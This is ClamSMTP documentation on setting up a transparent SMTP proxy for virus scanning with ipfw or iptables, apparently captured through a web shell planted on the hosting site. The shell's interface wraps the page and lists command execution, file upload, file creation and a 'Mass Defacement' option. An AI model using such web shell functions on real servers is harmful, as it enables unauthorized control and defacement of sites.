LmfaoX Private Shell.

Viewing file: transparent.html (4.18 KB) -rw-r--r--
Select action/file-type:
(+) |

(+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

ClamSMTP: Transparent Proxying

A transparent proxy is when you grab a certain type of traffic at your gateway or router and send it through a proxy without the knowledge of the user or client. Here's a simple description of how to use ClamSMTP as a transparent proxy to do virus checking on SMTP traffic going in or out of your network.

You should already be familiar with routing and network administration. Those topics are not touched on here.

Note that certain features of SMTP are disabled when going through clamsmtpd, most notably SSL/TLS. Authentication does however work. Transparent proxying has only been tested in recent versions of FreeBSD (using ipfw) and Linux (using iptables).

This setup assumes the clamsmtpd proxy is running on the same machine as the gateway. Running it on a different machine is possible, but more complicated to setup.

ClamSMTP Setup

Make sure you're using ClamSMTP version 0.8 or later.
Enable the TransparentProxy option in the config file. The OutAddress should be removed as the out address will be determined by the original destination of the SMTP connection.
Be sure you have enough connections to support all the anticipated SMTP traffic. Use the MaxConnections option to adjust this.
The examples below assume clamsmtpd is listening on the default port of 10025.
Make sure clamd (the ClamAV daemon) is running, and its listening on the socket you specified. You can set this in clamav.conf using the LocalSocket or TCPSocket directives (only uncomment one). Also make sure the ScanMail directive is on.
As usual, make sure to start clamsmtpd as the same user you run clamd, usually it's called clamav.

FreeBSD

Your kernel needs support for ipfw. You can either load this as a kernel module by executing the following:

# kldload ipfw.ko

Or you can build it into your kernel by adding the following lines to your kernel config file. See the FreeBSD Handbook for info on how to build a kernel. Make sure to install and reboot with the new kernel before proceeding.

IPFIREWALL
IPFIREWALL_FORWARD

Make sure IP forwarding (routing) is turned on. It probably already is as transparent proxying happens on a router.

Run the following command. It adds a line to your firewall to route traffic to clamsmtpd.

# ipfw add 100 fwd 127.0.0.1,10025 tcp from not me to any 25

Linux

If your kernel does not contain transparent proxy support you need to recompile your kernel with the following options. Recompling your linux kernel is beyond the scope of this document. You can find many tutorials on the subject online. After rebuilding and installing your new kernel make sure to reboot.

* Under General Setup
    o Networking support
    o Sysctl support
* Under Networking Options
    o Network packet filtering
    o TCP/IP networking
    o Fast switching: *NO*
* Under Networking Options -> IP: Netfilter Configuration
    o Connection tracking
    o IP tables support
    o Full NAT
    o REDIRECT target support
* Under File Systems
    o /proc filesystem support

Make sure IP forwarding (routing) is turned on. It probably already is as transparent proxying happens on a router.

Run the following command and add it to your boot scripts. Make sure to substitute your NIC name in the command below:

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 25 -j REDIRECT --to-port 10025

Command:
Quick Commands:
Upload:	[Read-Only] Max size: 100MB
PHP Filesystem:	<@�
Search File:	regexp
Create File:	Overwrite [Read-Only]
View File:
Mass Defacement:	[+] Main Directory: [+] Defacement Url:

ClamSMTP: Transparent Proxying

ClamSMTP Setup

FreeBSD

Linux

Copyright 2002, N. Nielsen [ clamsmtp | home page ]